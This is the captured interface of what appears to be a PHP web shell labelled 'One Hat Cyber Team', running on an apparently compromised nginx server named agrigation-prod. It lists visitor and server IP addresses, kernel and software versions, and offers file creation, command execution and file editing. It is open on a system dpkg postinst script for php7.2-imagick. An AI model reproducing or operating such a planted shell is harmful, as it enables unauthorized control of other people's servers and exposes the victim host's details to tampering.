One Hat Cyber Team
Your IP :
18.190.152.109
Server IP :
104.21.48.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
thread-self
/
root
/
var
/
lib
/
dpkg
/
info
/
Edit File:
php7.2-imagick.postinst
#!/bin/sh set -e # Automatically added by dh_php/UNDECLARED # Hey emacs, this is -*- shell-script -*- if [ -e /usr/lib/php/php-maintscript-helper ] ; then . /usr/lib/php/php-maintscript-helper for version in 7.2 ; do for name in imagick ; do php_invoke enmod "$version" ALL "$name" || exit 1 done done else for name in imagick ; do phpenmod "$name" done fi # End automatically added section
Simpan